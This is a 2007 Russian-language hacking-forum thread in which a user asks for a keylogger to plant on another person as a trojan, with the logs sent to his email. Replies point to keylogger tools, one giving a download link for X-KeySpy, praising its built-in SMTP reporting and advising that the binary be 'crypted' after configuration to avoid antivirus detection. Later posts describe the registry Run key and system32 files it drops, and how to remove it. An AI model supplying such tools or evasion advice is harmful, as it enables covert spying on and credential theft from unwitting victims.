ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Кейлогер нужен
  #1  
Старый 23.01.2007, 22:22
Аватар для Benzin
Benzin
Познающий
Регистрация: 15.01.2007
Сообщений: 41
Провел на форуме:
267196

Репутация: 6
По умолчанию Кейлогер нужен

Дайте плиз линк на хорошего кейлогера, только мыльного, типа как в пинче и хинче, но только чтоб работал.
___________
Спасибо!
 
Ответить с цитированием

  #2  
Старый 23.01.2007, 22:25
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

Я пользуюсь SC-KeyLog мне нравится)))

http://www.ruloads.com/utils/security/11730prog.html
 
Ответить с цитированием

  #3  
Старый 23.01.2007, 23:39
Аватар для Benzin
Benzin
Познающий
Регистрация: 15.01.2007
Сообщений: 41
Провел на форуме:
267196

Репутация: 6
По умолчанию

Цитата:
Сообщение от freddi  
Я пользуюсь SC-KeyLog мне нравится)))

http://www.ruloads.com/utils/security/11730prog.html
Я че то не понял как его юзать то, даже не врубился где ключ вводить... а то 10 дней всего, да и руссика на него че то не нашел...
 
Ответить с цитированием

  #4  
Старый 23.01.2007, 23:42
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

X-KeySpy v0.7
_http://freeshells.ch/~hsi/xkeyspy.zip
Очень приличный логгер. Имеет собственный smtp-сервер для отправки отчетов.
P.S. После конфигурирования желательно закриптовать тело.
 
Ответить с цитированием

  #5  
Старый 23.01.2007, 23:49
Аватар для Robin_Hood
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
Провел на форуме:
966901

Репутация: 444
Отправить сообщение для Robin_Hood с помощью ICQ
По умолчанию

http://www.actualspy.ru/
http://www.z-oleg.com/secur/articles/keylogger.php
http://worldcpp.vingrad.ru/vspp/zgrt117.php
http://content.mail.ru/pages/p_1684.html
http://www.izcity.com/lib/28042005.htm
гуглим товарищ
 
Ответить с цитированием

  #6  
Старый 23.01.2007, 23:56
Аватар для Benzin
Benzin
Познающий
Регистрация: 15.01.2007
Сообщений: 41
Провел на форуме:
267196

Репутация: 6
По умолчанию

Про актруал спай знаю, у самого стоит.., вы меня видимо не так поняли... мне нужно впарить кейлогер челу, как трояна, а потом просто словить лог на мыло или на хост, а эти вроде не по такому принцыпу работают..
Или я ошибаюсь, поправьте если че..
 
Ответить с цитированием

  #7  
Старый 24.01.2007, 00:22
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Benzin
Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб.
 
Ответить с цитированием

  #8  
Старый 24.01.2007, 00:47
Аватар для Benzin
Benzin
Познающий
Регистрация: 15.01.2007
Сообщений: 41
Провел на форуме:
267196

Репутация: 6
По умолчанию

Цитата:
Сообщение от hsi  
Benzin
Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб.
Пасиб, я уже понял после того как установил его.., я так понимаю впаривать надо сам keylogger. Я его себе запустил, где его искать теперь и как избавиться?
 
Ответить с цитированием

  #9  
Старый 24.01.2007, 01:15
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Benzin
Вот это я не помню.
Проще всего тебе будет запустить AVP и удалить им, так как эта версия некриптованная и ее сигнатура есть в базе.
Либо запустить еще раз и отследить манипуляции с ФС и реестром с помощью Regshot, File Monitor

Последний раз редактировалось hsi; 24.01.2007 в 01:23..
 
Ответить с цитированием

  #10  
Старый 24.01.2007, 01:46
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Расковырял я его.
Логгер делает следующее:
Пишет в реестр -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\svroot с параметром C:\WINDOWS\system32\svroot.exe
Пишет в системную папку два файла:
C:\WINDOWS\system32\svroot.dll
C:\WINDOWS\system32\gorsys32.dll
Чтобы избавиться от логгера достаточно удалить параметр из реестра и тело из системной папки.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
НУжен Хелп Хацкеров anakin Болталка 18 21.09.2006 19:21
Нужен форум PEPSICOLA Болталка 6 02.02.2005 22:10
Нужен антибаннерное прог ( саредсто вчате ) Kolobo4ek Чаты 0 13.03.2003 20:26
Нужен хороший нюк! Чаты 0 17.08.2002 02:19
Нужен хелп по одиге Чаты 1 13.06.2002 21:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ